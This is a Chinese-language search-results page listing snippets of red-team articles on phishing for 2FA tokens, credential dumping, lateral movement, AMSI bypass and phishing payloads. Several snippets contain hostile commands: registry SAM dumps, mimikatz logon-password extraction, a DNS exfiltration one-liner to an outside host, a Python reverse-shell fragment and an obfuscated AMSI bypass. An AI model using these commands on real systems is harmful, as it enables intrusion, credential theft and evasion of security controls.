首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏网络安全技术点滴分享

    使用CredSniper窃取行动中的2FA令牌

    使用CredSniper窃取行动中的2FA令牌Mike Felch // 随着越来越多组织强制要求使用双因素认证(2FA)来访问GSuite和OWA等外部服务,和渗透测试团队需要创新技术来捕获2FA CredSniper正是在行动中应运而生的工具,能够高效获取凭证和2FA令牌,甚至适用于技术资深的高级员工。CredSniper简介钓鱼攻击已存在多年,多数组织已开始在日常培训中提高员工安全意识。 CredSniper的核心思想是:在后台与真实门户交互时同步获取目标输入的2FA短信令牌。模板采用Jinja2语言,支持动态插入用户数据(如{{ username }})。 sniped:存储完整凭证,含2FA信息、IP及地理位置数据。页面克隆技巧使用FireFox插件“Save Page WE”克隆页面并内嵌资源,避免回调风险。 两者均为行动提供了强大支持。相关链接: CredSniper GitHub Evilginx2 GitHub

    25710编辑于 2025-07-31
  • 来自专栏全栈程序员必看

    靶机实战(2

    一天一靶机 生活充实而有趣,打算这几天把红日的几个靶机都给撸个遍。打起来还挺有意思。

    68720编辑于 2021-12-13
  • 来自专栏漏洞知识库

    内网渗透之各种密码凭证窃取 - 渗透笔记

    ----Micropoor 密码窃取 注册表读取密码 ---- 注册表读取密码主要获取的是两个文件: reg save HKLM\SYSTEM Sys.hiv reg save HKLM\SAM Sam.hiv 每个软件都使用不同的技术(明文,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。 域里面存在域控制器的c:\windows\ntds\ntds.dit中 ntds.dit其实就是一个esent数据库,微软本身就有一系列的文档化api能够操作这个数据库。

    3K30发布于 2020-11-25
  • 来自专栏Khan安全团队

    笔记 - 后渗透2

    TightVNC\Server -Name "Password" | select -ExpandProperty Password 此外,别忘了用sqlcmd或Invoke-SqlCmd来列举任何本地数据

    88820发布于 2021-10-12
  • 来自专栏Khan安全团队

    Tips

    在Windows上使用prtsc键时,taskhost/taskhostw会试图获得对一个不存在的文件的读取权限。

    33130编辑于 2022-04-02
  • 来自专栏Khan安全团队

    利器 - SharpSniper

    通常,参与不仅仅是实现域管理员。一些客户希望查看域中的特定用户是否会受到威胁,例如 CEO。

    34620编辑于 2022-07-13
  • 来自专栏渗透测试教程

    - 渗透小技巧

    2.phpinfo(收集绝对路径,真实ip,绕过xss的httponly($_SERVER[“HTTP_COOKIE”]),存在oci8推测数据库可能为oracle,),phpmyadmin,adminer 改为127.0.0.1,application/数据流也可以改,bp里面的一些非主流字符也可以删除掉,比如 ? 以及垃圾数据 ? 3.至于对抗waf,最重要的是要清楚waf的规则,拦截的参数,再来进一步绕过,具体可以参考我的上一篇文章。 4.遇到一个cms存在盲注,数据出的很慢,我们可以自己本地搭建一个,查看账号密码放在哪个表单。 本机的网络环境,c段的web资源,数据库位置,信任域(前提是我们是在域环境),等这类东西。 最后在是我们的密码,凭证。

    1.7K40发布于 2021-07-23
  • 来自专栏Khan安全团队

    笔记 - 横向移动

    大多数C2框架都有内置的功能(如Cobalt Strike中的 "窃取令牌 "功能)。 # Show tokens on the machine . 在这种情况下,s4u2self和s4u2proxy如上所述用于代表用户请求可转发票证。 滥用 MSSQL 数据库进行横向移动 MSSQL 数据库可以链接,这样如果你破坏一个数据库,你可以在特定用户的上下文中对其他数据库执行查询(甚至操作系统命令)如果这样配置,它甚至可以用来遍历森林边界 ,并收集有关(可访问的)数据库的更多信息。 我们还可以在链接的数据库上自动查找和执行查询或命令(甚至通过多层数据库链接)。

    2.4K10发布于 2021-10-12
  • 来自专栏HACK学习

    | Windows命名管道

    char buf_msg[BUF_SIZE]; //传递的最大字节数 DWORD dwRcv; //实际接收到的字节数 //创建命名管道,命名为MyPipe,消息只能从客户端流向服务器,读写数据采用阻塞模式 \n"); memset(buf_msg, 0, BUF_SIZE); //读取数据 while(1) { if (::ReadFile(hPipe, buf_msg, BUF_SIZE, &dwRcv 就是说相当于需要提供账户名密码这类东西证明身份,非匿名的访问 C2 信道 ? 命名管道还常被用作 C2 信道,通讯执行命令。

    2.5K20发布于 2021-06-24
  • 来自专栏HACK学习

    | InlineHook技术实现

    mov eax, DWORD PTR ss : [esp + 0x28] mov x, eax mov eax, DWORD PTR ss : [esp + 0x2c + 1; PAddr += *(DWORD*)PAddr+ 4; SetInlineHook((LPBYTE)Test, HookProc,9); Test(1, 2, reg.EBP, ebp } _asm { mov eax, DWORD PTR ss : [esp + 0x28] mov x, eax mov eax, DWORD PTR ss : [esp + 0x2c (BYTE*)Test + 1; PAddr += *(DWORD*)PAddr + 4; SetInlineHook((LPBYTE)PAddr, HookProc,9); Test(1, 2, 3); UnInlineHook(9); Test(1, 2, 3); return 0; } int main() { TestInlineHook(); //Test(1, 2, 3)

    78740发布于 2021-05-14
  • 来自专栏Gamma安全实验室

    技巧-网络钓鱼

    前言 涵盖了现在大多数钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜! 1. excel宏执行任意命令 新建一个exel表,然后打开,对准这个右键点击插入宏。 ? 2 Link钓鱼: 随便选择一个应用或者文件,右键点击创建快捷方式,右键打开属性: ? 我们需要更改目标这里的目标,这里的目标路径改成我们的攻击载荷,下面的起始位置可以不更改,基本上没啥影响。 PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item<em>2</em>"

    3.3K10发布于 2021-03-10
  • 来自专栏渗透测试红队专栏

    实战攻防(一)

    大家好,我是风起,最近一直在做安全研究及Kunyu的开发维护,已经好久没有写攻防相关的文章了,那么近期将带来 “实战攻防技术” 系列的文章。 当前行业内组织的 “蓝对抗演习” 在检验企业安全的同时也在磨练技术人员的技术水平,在近几年的演习中可以发现攻防双方的水准都有了极大的提升,本文将以的视角去阐述技术思想。 与常规的渗透测试相比,攻防更多的是渗透思想上的差异,而我个人的理解认为 “隐蔽”、“持久化”是最重要的思想,如何做到快速、高效的拿下目标,隐蔽、持久的进一步操作,也正是核心的差异所在。 熟悉我的读者,一定看过之前 “攻防基础建设” 相关的文章,本文也会串联之前知识点灵活的运用到实战场景下。 C2上,Linux上线CobaltStrike的方式可以使用CrossC2插件进行,这里仅作安全研究,所以不做此操作。

    1K50发布于 2021-08-23
  • 来自专栏Khan安全团队

    笔记 - 后渗透

    such as stored creds for scheduled tasks (elevate first) vault::list vault::cred /patch 使用 Mimikatz 滥用数据保护

    1.3K41发布于 2021-10-12
  • 来自专栏Khan安全团队

    横向 - 神奇小妙招

    2、用#MSTeams绕过#EDR 将有效负载复制到: %userprofile%\AppData\Local\Microsoft\Teams\current\ 然后: %userprofile

    43320编辑于 2022-01-27
  • 来自专栏肖萧然最秀

    常用命令

    \mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit 控制台执行多条命令,用log防止进程崩溃,数据丢失 mimikatz # privilege ping pwd|tr -d '\n'|xxd -ps.is1lv6.ceye.io base64原理和上面类似,主要是对值进行base64编码,然后替换掉“=”,即可成功外带数据。 pingpwd|base64|tr -d ‘=’.is1lv6.ceye.io 如果有多行数据需要外带,那么请考虑下面的语句。 #选择网卡 开始抓包 sniffer_stats 2 #查看状态 sniffer_dump 2 /tmp/lltest.pcap #导出pcap数据包 sniffer_stop 2 #停止抓包 #返回原始token # 2.steal_token窃取令牌 steal_token <pid值> #从指定进程中窃取token 先ps,找域控进程 drop_token #删除窃取

    5.1K50编辑于 2023-10-13
  • 来自专栏潇湘信安

    RequestTemplate内网渗透工具

    RequestTemplate是一款两端并用的渗透工具以及甲方自查工具,其在内网渗透过程中有着不可替代的作用。 客户端用Golang以其精巧、快速的特点打造而成,快速发现内网中脆弱的一环。 项目地址: https://github.com/1n7erface/RequestTemplate 0x01 应用场景 蓝对抗中的内网利器 甲方建设中内网的自查帮手 0x02 具备特点 网段探测 代理管理 2. 目标管理 3.

    1.7K30编辑于 2022-09-22
  • 来自专栏FreeBuf

    渗透项目之GoldenEye

    接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该文章都能学习到一些的技巧和知识。 2、挖掘HTTP服务 访问:http://192.168.4.202,显示的文本提示了一条线索,它说进入到/sev-home/目录中。 dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.4.202 -s 55007 pop3 -L 引用用户密码文本 -P 引用密码文本 等待2~ s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 保存后当对方服务器环境在某个点触发条件就会执行该命令 五、总结 通过以上的学习,我们认知了一些的小技巧的技术手段,完成了从信息收集到内核提权项目落地,学习到了非常多的技巧,例如nmap、hysra、pop3-nc、MSF、EXP等等的编译和使用提权等,

    2K20编辑于 2022-02-23
  • 来自专栏Khan安全团队

    笔记 - PowerShell AMSI Bypass

    amsiInitFailed','NonPublic,Static').SetValue($null,$true) 用于复制粘贴的混淆例子: sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )." GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.' g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli' 目的 Invoke-CradleCrafter 的存在是为了帮助蓝轻松探索、生成和混淆 PowerShell 远程下载托架。

    1.3K20发布于 2021-10-12
  • 来自专栏Gamma安全实验室

    技巧-常规横向手法

    前言 域内横向移动技术是作战在域内最基本技术之一,人员会利用该技术,以被攻陷的系统为跳板,通过已经收集的凭据和密码,来访问域内其他主机,扩大战果,最终目的是获取到dc的访问控制权限。 3.客户端连接执行命令,服务端启动相应的程序并执行回显数据。 4.运行完后删除服务。 2、防火墙对5986、5985端口开放。 是一个Visual Basic脚本,允许管理员“配置WinRM并获取数据或管理资源” 是基于WinRM脚本API,而这个api使我们使能够从远程计算机执行WS-Management协议操作和获得数据。 即使WinRM服务正在运行,也无法接收或发送请求数据的WS-Management协议消息。 Internet连接防火墙(ICF)阻止访问端口。

    2.8K20发布于 2021-07-01
  • 来自专栏FreeBuf

    技巧:仿冒Windows登录

    Metasploit带有内置的后期漏洞利用功能,可帮助我们完成任务。由于它是后渗透的模块,因此只需要输入会话即可:

    2K10发布于 2020-05-29
领券